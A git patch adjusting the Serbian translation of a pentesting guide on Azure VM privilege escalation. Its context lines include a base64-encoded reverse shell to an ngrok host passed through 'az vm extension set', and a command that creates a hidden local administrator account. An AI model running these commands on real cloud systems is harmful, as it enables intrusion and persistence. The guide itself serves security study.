From ad1520a4e54d84aa61e9de33d4d7fb3be9df398b Mon Sep 17 00:00:00 2001 From: Translator Date: Wed, 12 Feb 2025 14:27:16 +0000 Subject: [PATCH] Translated ['src/pentesting-cloud/azure-security/az-privilege-escalation --- .../az-virtual-machines-and-network-privesc.md | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md index 829c7c679..0a4d60e27 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md @@ -34,7 +34,7 @@ az vm extension set \ --settings '{}' \ --protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}' ``` -- Izvršite skriptu koja se nalazi na internetu +- Izvršite skriptu smeštenu na internetu ```bash az vm extension set \ --resource-group rsc-group> \ @@ -78,7 +78,7 @@ az vm extension set \ ``` Možete takođe izvršiti druge payload-ove kao što su: `powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add` -- Resetujte lozinku koristeći VMAccess ekstenziju +- Resetovanje lozinke koristeći VMAccess ekstenziju ```bash # Run VMAccess extension to reset the password $cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password @@ -155,15 +155,15 @@ Set-AzVMDscExtension `
-Hibridni Runbook Radnik +Hybrid Runbook Worker -Ovo je VM ekstenzija koja bi omogućila izvršavanje runbook-ova u VM-ovima iz automatskog naloga. Za više informacija pogledajte [Automatske naloge](../az-services/az-automation-account/index.html). +Ovo je VM ekstenzija koja bi omogućila izvršavanje runbook-ova u VM-ovima iz automatskog naloga. Za više informacija proverite [Automation Accounts service](../az-services/az-automation-account/index.html).
### `Microsoft.Compute/disks/write, Microsoft.Network/networkInterfaces/join/action, Microsoft.Compute/virtualMachines/write, (Microsoft.Compute/galleries/applications/write, Microsoft.Compute/galleries/applications/versions/write)` -Ovo su potrebne dozvole za **kreiranje nove galerijske aplikacije i njeno izvršavanje unutar VM-a**. Galerijske aplikacije mogu izvršavati bilo šta, tako da bi napadač mogao iskoristiti ovo da kompromituje VM instance izvršavajući proizvoljne komande. +Ovo su potrebne dozvole za **kreiranje nove galerijske aplikacije i njeno izvršavanje unutar VM-a**. Galerijske aplikacije mogu izvršavati bilo šta, tako da bi napadač mogao da iskoristi ovo da kompromituje VM instance izvršavajući proizvoljne komande. Poslednje 2 dozvole mogu se izbeći deljenjem aplikacije sa zakupcem. @@ -343,7 +343,7 @@ az vm identity assign \ /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity1 \ /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity2 ``` -Napadač mora **neki način kompromitovati VM** da bi ukrao tokene iz dodeljenih upravljanih identiteta. Proverite **više informacija u**: +Napadač mora da **kompromituje VM** kako bi ukrao tokene iz dodeljenih upravljanih identiteta. Proverite **više informacija u**: {{#ref}} https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html#azure-vm